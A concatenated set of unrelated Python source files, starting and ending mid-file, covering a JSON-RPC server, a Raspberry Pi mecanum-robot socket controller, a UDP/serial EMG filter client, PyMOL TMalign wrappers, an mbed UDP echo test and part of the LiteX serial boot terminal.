if __name__ == "__main__":
test_main()
|
server26.py
|
# -*- coding: utf-8 -*-
import json
import select
import threading
import SocketServer
from server_common import (SimpleJSONRPCDispatcher,
SimpleJSONRPCRequestHandler)
class SimpleJSONRPCServer(SocketServer.TCPServer,
SimpleJSONRPCDispatcher):
"""Simple JSON-RPC server.
Simple JSON-RPC server that allows functions and a single instance
to be installed to handle requests. The default implementation
attempts to dispatch JSON-RPC calls to the functions or instance
installed in the server. Override the _dispatch method inhereted
from SimpleJSONRPCDispatcher to change this behavior.
"""
allow_reuse_address = True
def __init__(self, addr, requestHandler=SimpleJSONRPCRequestHandler,
logRequests=True):
self.logRequests = logRequests
SimpleJSONRPCDispatcher.__init__(self, allow_none=True, encoding=None)
SocketServer.TCPServer.__init__(self, addr, requestHandler)
self.__thread = None
def serve_forever(self, in_thread=False, poll_interval=0.5):
def serve_thread(server, poll_interval):
server.serve_forever(poll_interval=poll_interval)
if in_thread:
args = [self, poll_interval]
self.__thread = threading.Thread(target=serve_thread, args=args)
self.__thread.setDaemon(True)
self.__thread.start()
else:
SocketServer.TCPServer.serve_forever(self, poll_interval)
def shutdown(self, immediately = True):
if not immediately:
self._BaseServer__serving = False
return
SocketServer.TCPServer.shutdown(self)
if self.__thread:
self.__thread.join()
self.__thread = None
|
server-tad-pi-v2.py
|
import socket
from multiprocessing import Process, Manager
import time
import sys
import RPi.GPIO as GPIO
import os
'''
!!!THIS IS FOR LOCALHOST TESTING!!!
Writen by Gunnar Bjorkman to control a robot via raspberrypi
Current design:
* Recieve client's inputs and send server/robot info to client over socket
connection.
* Controls ESCs and servos that are plugged into the GPIO ports on the
raspberrypi.
* Uses TCP bi-directional connection (both server and client can send and
recieve data).
* Multiprocessing so the server can listen for messages and control the
robot simultaneously.
Copy file over ssh to raspberrypi:
scp {PATH TO THIS} pi@raspberrypi:~/Desktop/
*** this exact command is for my computer only, use: ***
scp ~/Documents/Code/python/gunn-pi/{THIS}.py pi@raspberrypi:~/Desktop/
'''
### Server Stuff
SERVER = "192.168.0.197" # 169.254.209.111
PORT = 6762
s = socket.socket()
s.bind((SERVER, PORT))
s.listen(1024)
def messageCatcher(inputs, _):
while True:
c, addr = s.accept() # Establish connection with client.
try:
print 'client connected:'+str(addr)
while True:
data = c.recv(1024)
#print data
if data.startswith("data:"):
data, _ = data.split(';', 1)
_, x_axis, y_axis, z_axis, switch_axis, button_11, button_12 = data.split()
inputs['x_axis'] = float(x_axis)
inputs['y_axis'] = float(y_axis)
inputs['z_axis'] = float(z_axis)
inputs['switch_axis'] = float(switch_axis)
inputs['button_11'] = int(button_11)
inputs['button_12'] = int(button_12)
c.sendall("battery:"+str(inputs['battery'])+";")
if data:
c.sendall('ping;')
else:
print 'Donnection died'
break
finally:
c.close()
def mainProcess(inputs, _):
### Variables global to the main process
# Base Control
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT) # motor 1
GPIO.setup(18, GPIO.OUT) # motor 2
GPIO.setup(27, GPIO.OUT) # motor 3
GPIO.setup(22, GPIO.OUT) # motor 4
GPIO.setup(23, GPIO.OUT) # motor lift
GPIO.setup(24, GPIO.OUT) # motor sweep
GPIO.setup(25, GPIO.OUT) # servo hatch
m1 = GPIO.PWM(17, 50)
m2 = GPIO.PWM(18, 50)
m3 = GPIO.PWM(27, 50)
m4 = GPIO.PWM(22, 50)
mL = GPIO.PWM(23, 50)
mS = GPIO.PWM(24, 50)
sH = GPIO.PWM(25, 50)
m1.start(7)
m2.start(7)
m3.start(7)
m4.start(7)
mL.start(7)
mS.start(7)
sH.start(7)
m1_prev_duty = 7
m2_prev_duty = 7
m3_prev_duty = 7
m4_prev_duty = 7
mL_prev_duty = 7
mS_prev_duty = 7
sH_prev_duty = 7
# Negates inputs within the threshold and returns remaining values as
# their corresponding -1 through 1 values. And rounds to two decimals.
#
# Only useful for analog/axial inputs
def inputFilter(x):
thresh_hold = 0.1
if x < 0:
thresh_hold = -thresh_hold
x = min(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
else:
x = max(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
return round(x, 2)
while True:
# Filter the inputs through 'inputFilter()'
x_axis = -1 * inputFilter(inputs['x_axis'])
y_axis = -1 * inputFilter(inputs['y_axis'])
z_axis = -1 * inputFilter(inputs['z_axis'])
switch_axis = inputFilter(inputs['switch_axis'])
print(x_axis)
print(y_axis)
print(z_axis)
print(switch_axis)
horizontal_power = (x_axis * 4) + 7
vertical_power = (y_axis * 4) + 7
print("longitudinal movement: " + str(vertical_power))
print("strafe movement: " + str(horizontal_power))
print(" ")
# Mecanum-Wheel equation
m1_duty_cycle = min(11, max(3, ((y_axis - x_axis - z_axis) * 4) + 7))
m3_duty_cycle = min(11, max(3, ((y_axis - x_axis + z_axis) * 4) + 7))
m2_duty_cycle = min(11, max(3, ((y_axis + x_axis - z_axis) * 4) + 7))
m4_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
# Omni-Wheel equation
# m1_duty_cycle = min(11, max(3, (-1 * (x_axis - (-1 * z_axis)) * 4) + 7))
# m3_duty_cycle = min(11, max(3, ( 1 * (x_axis + (-1 * z_axis)) * 4) + 7))
# m2_duty_cycle = min(11, max(3, (-1 * (y_axis - (-1 * z_axis)) * 4) + 7))
# m4_duty_cycle = min(11, max(3, ( 1 * (y_axis + (-1 * z_axis)) * 4) + 7))
# Lift speed
mL_duty_cycle = min(11, max(3, ((switch_axis) * 4) + 7))
# Sweeper drum speed
mS_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
print("Motor 1: " + str(m1_duty_cycle))
print("Motor 2: " + str(m2_duty_cycle))
print("Motor 3: " + str(m3_duty_cycle))
print("Motor 4: " + str(m4_duty_cycle))
if horizontal_power > 10:
inputs['battery'] = 1
print 'battery = 1'
else:
inputs['battery'] = 0
print 'battery = 0'
if m1_prev_duty != m1_duty_cycle:
m1.ChangeDutyCycle(m1_duty_cycle)
m1_prev_duty = m1_duty_cycle
print 'm1 change'
if m2_prev_duty != m2_duty_cycle:
m2.ChangeDutyCycle(m2_duty_cycle)
m2_prev_duty = m2_duty_cycle
print 'm2 change'
if m3_prev_duty != m3_duty_cycle:
m3.ChangeDutyCycle(m3_duty_cycle)
m3_prev_duty = m3_duty_cycle
print 'm3 change'
if m4_prev_duty != m4_duty_cycle:
m4.ChangeDutyCycle(m4_duty_cycle)
m4_prev_duty = m4_duty_cycle
print 'm4 change'
if mL_prev_duty != mL_duty_cycle:
mL.ChangeDutyCycle(mL_duty_cycle)
mL_prev_duty = mL_duty_cycle
print 'mL change'
if mS_prev_duty != mS_duty_cycle:
mS.ChangeDutyCycle(mS_duty_cycle)
mS_prev_duty = mS_duty_cycle
print 'mS change'
#sH.ChangeDutyCycle(sH_duty_cycle)
#m1.ChangeDutyCycle(horizontal_power) # between 2.5 & 12.5
time.sleep(0.05)
os.system('clear') # Clear screen for Mac and Linux
if __name__ == "__main__":
manager = Manager()
inputs = manager.dict()
inputs['x_axis'] = 0
inputs['y_axis'] = 0
inputs['z_axis'] = 0
inputs['switch_axis'] = 0
inputs['battery'] = 0
# - multiprocessing runs a separate instance of python, typical
# global variables are not shared between child processes
mC = Process(target=messageCatcher, args=(inputs, 1))
mP = Process(target=mainProcess, args=(inputs, 1))
mC.start()
mP.start()
mC.join()
mP.join()
|
queue_order.py
|
#!/usr/bin/python
from multiprocessing import Process, Queue
import time
import random
# the example demonstrates how to get the
# correct order of the calculations for input data
def square(idx, x, queue):
time.sleep(random.randint(1, 3))
queue.put((idx, x * x))
def main():
data = [2, 4, 6, 3, 5, 8, 9, 7]
queue = Queue()
processes = [Process(target=square, args=(idx, val, queue))
for idx, val in enumerate(data)]
for p in processes:
p.start()
for p in processes:
p.join()
unsorted_result = [queue.get() for _ in processes]
result = [val[1] for val in sorted(unsorted_result)]
print(result)
if __name__ == '__main__':
main()
|
udpclientv2.py
|
import socket
import sys
import time
import serial
import threading
import numpy as np
from scipy import signal
from scipy.signal import lfilter , iirnotch , butter , filtfilt , medfilt
import csv
writeToFile = True
read = True
def process():
global strm,m1p,m2p,m3p,m4p,o1p,o2p,o3p,o4p,win,cnt
if strm >= 100:
normalize()
remove_artifacts()
samp = str(win)+","+str(int(rms(m1p)))+","+str(int(rms(m2p)))+","+str(int(rms(m3p)))+","+str(int(rms(m4p)))+"\n"
print(samp)
return samp
else :
return "Null"
return
def rms(x):
return np.sqrt(x.dot(x)/x.size)
def normalize():
global m1 , m2 , m3 , m4
m1[:win] = m1[:win] - np.mean(m1[:win])
m2[:win] = m2[:win] - np.mean(m2[:win])
m3[:win] = m3[:win] - np.mean(m3[:win])
m4[:win] = m4[:win] - np.mean(m4[:win])
def remove_artifacts():
global m1p,m2p,m3p,m4p,o1p,o2p,o3p,o4p,m1,m2,m3,m4,o1,o2,o3,o4,win
m1p = remove_powerline(m1[:win])
m1p = lfilter(bemg, aemg, m1p)
m1p = medfilt(m1p, 11)
m2p = remove_powerline(m2[:win])
m2p = lfilter(bemg, aemg, m2p)
m2p = medfilt(m2p, 11)
m3p = remove_powerline(m3[:win])
m3p = lfilter(bemg, aemg, m3p)
m3p = medfilt(m3p, 11)
m4p = remove_powerline(m4[:win])
m4p = lfilter(bemg, aemg, m4p)
m4p = medfilt(m4p, 11)
def remove_powerline(x):
y = lfilter(b1, a1, x)
y = lfilter(b2, a2, y)
return y
def udp_receive():
global read
UDP_RX_IP_ADDRESS = "127.0.0.1"
UDP_RX_PORT_NO = 6790
ss = socket.socket(socket.AF_INET , socket.SOCK_DGRAM)
ss.bind((UDP_RX_IP_ADDRESS,UDP_RX_PORT_NO))
threadRun = True
while threadRun:
data , addr = ss.recvfrom(1024)
if data:
print "Message from Thread:" , data
if data == '1':
ser.write("1")
elif data == '2':
ser.write("2")
elif data == '0':
ser.write("2")
threadRun = False
UDP_IP_ADDRESS = "127.0.0.1"
UDP_PORT_NO = 6789
thr1 = threading.Thread(target=udp_receive, args=())
thr1.start()
ser = serial.Serial('/dev/ttyACM0', 2000000, timeout=None, xonxoff=False, rtscts=False, dsrdtr=False)
cs = socket.socket(socket.AF_INET , socket.SOCK_DGRAM)
win = 100
fs = 1000
whp = 30.0/fs
Q = 30
strm = 0
cnt = 0
eda = []
m1 = []
m2 = []
m3 = []
m4 = []
o1 = []
o2 = []
o3 = []
o4 = []
m1p = np.zeros(win)
m2p = np.zeros(win)
m3p = np.zeros(win)
m4p = np.zeros(win)
o1p = np.zeros(win)
o2p = np.zeros(win)
o3p = np.zeros(win)
o4p = np.zeros(win)
b1, a1 = iirnotch(60*2/fs, Q)
b2, a2 = iirnotch(60*4/fs, Q)
bemg , aemg = butter(3,whp, btype='high', analog=True)
if(writeToFile):
ofile = open('test1_Smile_3.csv', "wb")
writer = csv.writer(ofile, delimiter=' ', quotechar='"', quoting=csv.QUOTE_NONE , escapechar='\n')
while read:
data = ser.readline()
if data:
#if(writeToFile):
#writer.writerow([data])
strSample = str(data).split(',')
strm = strm + 1
eda.append(int(strSample[2]))
m1.append(int(strSample[3]))
m2.append(int(strSample[4]))
m3.append(int(strSample[9]))
m4.append(int(strSample[10]))
o1.append(int(strSample[5]))
o2.append(int(strSample[6]))
o3.append(int(strSample[7]))
o4.append(int(strSample[8]))
if strm == 2*win:
m1 = m1[win:]
m2 = m2[win:]
m3 = m3[win:]
m4 = m4[win:]
o1 = o1[win:]
o2 = o2[win:]
o3 = o3[win:]
o4 = o4[win:]
strm = win
sp = process()
writer.writerow(str(sp))
#cs.sendto(process(), (UDP_IP_ADDRESS,UDP_PORT_NO))
|
tmalign.py
|
'''
(c) 2011-2012 Thomas Holder, MPI for Developmental Biology
'''
from __future__ import print_function
__author__ = 'Thomas Holder'
__version__ = '1.1'
__license__ = 'BSD-2-Clause'
from pymol import cmd, CmdException
def save_pdb_without_ter(filename, selection, **kwargs):
'''
DESCRIPTION
Save PDB file without TER records. External applications like TMalign and
DynDom stop reading PDB files at TER records, which might be undesired in
case of missing loops.
'''
v = cmd.get_setting_boolean('pdb_use_ter_records')
if v: cmd.unset('pdb_use_ter_records')
cmd.save(filename, selection, **kwargs)
if v: cmd.set('pdb_use_ter_records')
def alignwithanymethod(mobile, target, methods='align super cealign tmalign',
async=1, quiet=1):
'''
DESCRIPTION
Align copies of mobile to target with several alignment methods
ARGUMENTS
mobile = string: atom selection
target = string: atom selection
methods = string: space separated list of PyMOL commands which take
arguments "mobile" and "target" (in any order) {default: align super
cealign tmalign}
'''
import threading
import time
methods = methods.split()
async, quiet = int(async), int(quiet)
mobile_obj = cmd.get_object_list('first (' + mobile + ')')[0]
def myalign(method):
newmobile = cmd.get_unused_name(mobile_obj + '_' + method)
cmd.create(newmobile, mobile_obj)
start = time.time()
cmd.do('%s mobile=%s in %s, target=%s' % (method, newmobile, mobile, target))
if not quiet:
print('Finished: %s (%.2f sec)' % (method, time.time() - start))
for method in methods:
if async:
t = threading.Thread(target=myalign, args=(method,))
t.setDaemon(1)
t.start()
else:
myalign(method)
def tmalign(mobile, target, args='', exe='~/bin/TMalign', ter=0, transform=1, object=None, quiet=0):
'''
DESCRIPTION
TMalign wrapper
Reference: Y. Zhang and J. Skolnick, Nucl. Acids Res. 2005 33, 2302-9
http://zhanglab.ccmb.med.umich.edu/TM-align/
USAGE
tmalign mobile, target [, args [, exe ]]
ARGUMENTS
mobile, target = string: atom selections
args = string: Extra arguments like -d0 5 -L 100
exe = string: Path to TMalign executable {default: TMalign}
ter = 0/1: If ter=0, then ignore chain breaks because TMalign will stop
at first TER record {default: 0}
SEE ALSO
tmscore, mmalign
'''
import subprocess, tempfile, os, re
ter, quiet = int(ter), int(quiet)
mobile_filename = tempfile.mktemp('.pdb', 'mobile')
target_filename = tempfile.mktemp('.pdb', 'target')
matrix_filename = tempfile.mktemp('.txt', 'matrix')
mobile_ca_sele = '(%s) and (not hetatm) and name CA and alt +A' % (mobile)
target_ca_sele = '(%s) and (not hetatm) and name CA and alt +A' % (target)
if ter:
save = cmd.save
else:
save = save_pdb_without_ter
save(mobile_filename, mobile_ca_sele)
save(target_filename, target_ca_sele)
exe = cmd.exp_path(exe)
args = [exe, mobile_filename, target_filename, '-m', matrix_filename] + args.split()
try:
process = subprocess.Popen(args, stdout=subprocess.PIPE)
lines = process.stdout.readlines()
except OSError:
print('Cannot execute "%s", please provide full path to TMscore or TMalign executable' % (exe))
raise CmdException
finally:
os.remove(mobile_filename)
os.remove(target_filename)
# TMalign >= 2012/04/17
if os.path.exists(matrix_filename):
lines += open(matrix_filename).readlines()
os.remove(matrix_filename)
r = None
re_score = re.compile(r'TM-score\s*=\s*(\d*\.\d*)')
rowcount = 0
matrix = []
line_it = iter(lines)
alignment = []
for line in line_it:
if 4 >= rowcount > 0:
if rowcount >= 2:
a = list(map(float, line.split()))
matrix.extend(a[2:5])
matrix.append(a[1])
rowcount += 1
elif line.lower().startswith(' -------- rotation matrix'):
rowcount = 1
elif line.startswith('(":" denotes'):
alignment = [line_it.next().rstrip() for i in range(3)]
else:
match = re_score.search(line)
if match is not None:
r = float(match.group(1))
if not quiet:
print(line.rstrip())
if not quiet:
for i in range(0, len(alignment[0])-1, 78):
for line in alignment:
print(line[i:i+78])
print('')
assert len(matrix) == 3*4
matrix.extend([0,0,0,1])
if int(transform):
cmd.transform_selection('byobject (%s)' % (mobile), matrix, homogenous=1)
# alignment object
if object is not None:
mobile_idx, target_idx = [], []
space = {'mobile_idx': mobile_idx, 'target_idx': target_idx}
cmd.iterate(mobile_ca_sele, 'mobile_idx.append("%s`%d" % (model, index))', space=space)
cmd.iterate(target_ca_sele, 'target_idx.append("%s`%d" % (model, index))', space=space)
for i, aa in enumerate(alignment[0]):
if aa == '-':
mobile_idx.insert(i, None)
for i, aa in enumerate(alignment[2]):
if aa == '-':
target_idx.insert(i, None)
if (len(mobile_idx) == len(target_idx) == len(alignment[2])):
cmd.rms_cur(
' '.join(idx for (idx, m) in zip(mobile_idx, alignment[1]) if m in ':.'),
' '.join(idx for (idx, m) in zip(target_idx, alignment[1]) if m in ':.'),
cycles=0, matchmaker=4, object=object)
else:
print('Could not load alignment object')
if not quiet and r is not None:
print('Found in output TM-score = %.4f' % (r))
return r
def tmscore(mobile, target, args='', exe='~/bin/TMscore', quiet=0, **kwargs):
'''
DESCRIPTION
TMscore wrapper
Reference: Yang Zhang and Jeffrey Skolnick, Proteins 2004 57: 702-710
http://zhanglab.ccmb.med.umich.edu/TM-score/
ARGUMENTS
mobile, target = string: atom selections
args = string: Extra arguments like -d 5
exe = string: Path to TMscore executable {default: TMscore}
ter = 0/1: If ter=0, then ignore chain breaks because TMscore will stop
at first TER record {default: 0}
SEE ALSO
tmalign, mmalign
'''
kwargs.pop('_self', None)
return tmalign(mobile, target, args, exe, quiet=quiet, **kwargs)
def mmalign(mobile, target, args='', exe='~/bin/MMalign', ter=0, transform=1, quiet=0):
'''
DESCRIPTION
MMalign wrapper
Reference: S. Mukherjee and Y. Zhang, Nucleic Acids Research 2009; 37: e83
http://zhanglab.ccmb.med.umich.edu/MM-align/
SEE ALSO
tmalign, tmscore
'''
return tmalign(mobile, target, args, exe, ter, transform, quiet=quiet)
# pymol commands
cmd.extend('alignwithanymethod', alignwithanymethod)
cmd.extend('tmalign', tmalign)
cmd.extend('tmscore', tmscore)
cmd.extend('mmalign', tmalign)
# autocompletion
cmd.auto_arg[0].update({
'tmalign': cmd.auto_arg[0]['align'],
'tmscore': cmd.auto_arg[0]['align'],
'mmalign': cmd.auto_arg[0]['align'],
})
cmd.auto_arg[1].update({
'tmalign': cmd.auto_arg[1]['align'],
'tmscore': cmd.auto_arg[1]['align'],
'mmalign': cmd.auto_arg[1]['align'],
})
|
udp_echo_client.py
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import socket
from sys import stdout
from threading import Thread
from SocketServer import BaseRequestHandler, UDPServer
from mbed_host_tests import BaseHostTest, event_callback
class UDPEchoClientHandler(BaseRequestHandler):
def handle(self):
""" UDP packet handler. Echoes data back to sender's address.
"""
data, sock = self.request
print ('HOST: UDPEchoClientHandler: Rx: \n%s\n' % data)
sock.sendto(data, self.client_address)
class UDPEchoClientTest(BaseHostTest):
def __init__(self):
"""
Initialise test parameters.
:return:
"""
BaseHostTest.__init__(self)
self.SERVER_IP = None # Will be determined after knowing the target IP
self.SERVER_PORT = 0 # Let TCPServer choose an arbitrary port
self.server = None
self.server_thread = None
self.target_ip = None
@staticmethod
def find_interface_to_target_addr(target_ip):
"""
Finds IP address of the interface through which it is connected to the target.
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_ip, 0)) # Target IP, any port
except socket.error:
s.connect((target_ip, 8000)) # Target IP, 'random' port
ip = s.getsockname()[0]
s.close()
return ip
def setup_udp_server(self):
"""
sets up a UDP server for target to connect and send test data.
:return:
"""
# !NOTE: There should mechanism to assert in the host test
if self.SERVER_IP is None:
self.log("setup_udp_server() called before determining server IP!")
self.notify_complete(False)
# Returning none will suppress host test from printing success code
self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler)
ip, port = self.server.server_address
self.SERVER_PORT = port
self.server.allow_reuse_address = True
self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT))
self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,))
self.server_thread.start()
@staticmethod
def server_thread_func(this):
"""
Thread function to run TCP server forever.
:param this:
:return:
"""
this.server.serve_forever()
@event_callback("target_ip")
def _callback_target_ip(self, key, value, timestamp):
"""
Callback to handle reception of target's IP address.
:param key:
:param value:
:param timestamp:
:return:
"""
self.target_ip = value
self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip)
self.setup_udp_server()
@event_callback("host_ip")
def _callback_host_ip(self, key, value, timestamp):
"""
Callback for request for host IP Addr
"""
self.send_kv("host_ip", self.SERVER_IP)
@event_callback("host_port")
def _callback_host_port(self, key, value, timestamp):
"""
Callback for request for host port
"""
self.send_kv("host_port", self.SERVER_PORT)
def teardown(self):
if self.server:
self.server.shutdown()
self.server_thread.join()
|
litex_term.py
|
#!/usr/bin/env python3
# This file is Copyright (c) 2015-2019 Florent Kermarrec <florent@enjoy-digital.fr>
# This file is Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# This file is Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# License: BSD
import sys
import signal
import os
import time
import serial
import threading
import argparse
import json
if sys.platform == "win32":
import msvcrt
class Console:
def configure(self):
pass
def unconfigure(self):
pass
def getkey(self):
return msvcrt.getch()
else:
import termios
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
self.default_settings = termios.tcgetattr(self.fd)
def configure(self):
settings = termios.tcgetattr(self.fd)
settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
settings[6][termios.VMIN] = 1
settings[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, settings)
def unconfigure(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
def getkey(self):
return os.read(self.fd, 1)
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 251
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_load_no_crc = b"\x03"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
crc = 0
for d in l:
crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
return crc & 0xffff
class SFLFrame:
def __init__(self):
self.cmd = bytes()
self.payload = bytes()
def compute_crc(self):
return crc16(self.cmd + self.payload)
def encode(self):
packet = bytes([len(self.payload)])
packet += self.compute_crc().to_bytes(2, "big")
packet += self.cmd
packet += self.payload
return packet
class LiteXTerm:
def __init__(self, serial_boot, kernel_image, kernel_address, json_images, no_crc):
self.serial_boot = serial_boot
assert not (kernel_image is not None and json_images is not None)
self.mem_regions = {}
if kernel_image is not None:
self.mem_regions = {kernel_image: kernel_address}
self.boot_address = kernel_address
if json_images is not None:
f = open(json_images, "r")
self.mem_regions.update(json.load(f))
self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
f.close()
self.no_crc = no_crc
self.reader_alive = False
self.writer_alive = False
self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
self.magic_detect_buffer = bytes(len(sfl_magic_req))
self.console = Console()
signal.signal(signal.SIGINT, self.sigint)
self.sigint_time_last = 0
def open(self, port, baudrate):
if hasattr(self, "port"):
return
self.port = serial.serial_for_url(port, baudrate)
def close(self):
if not hasattr(self, "port"):
return
self.port.close()
del self.port
def sigint(self, sig, frame):
self.port.write(b"\x03")
sigint_time_current = time.time()
# Exit term if 2 CTRL-C pressed in less than 0.5s.
if (sigint_time_current - self.sigint_time_last < 0.5):
self.console.unconfigure()
self.close()
sys.exit()
else:
self.sigint_time_last = sigint_time_current
def send_frame(self, frame):
retry = 1
while retry:
self.port.write(frame.encode())
if not self.no_crc:
# Get the reply from the device
reply = self.port.read()
if reply == sfl_ack_success:
retry = 0
elif reply == sfl_ack_crcerror:
retry = 1
else:
print("[LXTERM] Got unknown reply '{}' from the device, aborting.".format(reply))
return 0
else:
retry = 0
return 1
def upload(self, filename, address):
with open(filename, "rb") as f:
data = f.read()
print("[LXTERM] Uploading {} to 0x{:08x} ({} bytes)...".format(filename, address, len(data)))
current_address = address
position = 0
length = len(data)
start = time.time()
while len(data):
sys.stdout.write("|{}>{}| {}%\r".format('=' * (20*position//length),
' ' * (20-20*position//length),
100*position//length))
sys.stdout.flush()
frame = SFLFrame()
frame_data = data[:sfl_payload_length]
frame.cmd = sfl_cmd_load if not self.no_crc else sfl_cmd_load_no_crc
frame.payload = current_address.to_bytes(4, "big")
frame.payload += frame_data
if self.send_frame(frame) == 0:
return
current_address += len(frame_data)
position += len(frame_data)
try:
data = data[sfl_payload_length:]
except:
data = []
end = time.time()
elapsed = end - start
print("[LXTERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
return length
def boot(self):
print("[LXTERM] Booting the device.")
frame = SFLFrame()
frame.cmd = sfl_cmd_jump
frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
self.send_frame(frame)
def detect_prompt(self, data):
if len(data):
self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
return self.prompt_detect_buffer == sfl_prompt_req
else:
return False
def answer_prompt(self):
print("[LXTERM] Received serial boot prompt from the device.")
self.port.write(sfl_prompt_ack)
def detect_magic(self, data):
if len(data):
self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
return self.magic_detect_buffer == sfl_magic_req
else:
return False
def answer_magic(self):
print("[LXTERM] Received firmware download request from the device.")
if(len(self.mem_regions)):
self.port.write(sfl_magic_ack)
for filename, base in self.mem_regions.items():
self.upload(filename, int(base, 16))
self.boot()
print("[LXTERM] Done.");
def reader(self):
try:
while self.reader_alive:
c = self.port.read()
sys.stdout.buffer.write(c)
sys.stdout.flush()
if len(self.mem_regions):
if self.serial_boot and self.detect_prompt(c):
self.answer_prompt()
if self.detect_magic(c):
self.answer_magic()
except serial.SerialException:
self.reader_alive = False
self.console.unconfigure()
raise
def start_reader(self):
self.reader_alive = True
self.reader_thread = threading.Thread(target=self.reader)
self.reader_thread.setDaemon(True)
self.reader_thread.start()
def stop_reader(self):
self.reader_alive = False
self.reader_thread.join()
def writer(self):
try:
while self.writer_alive:
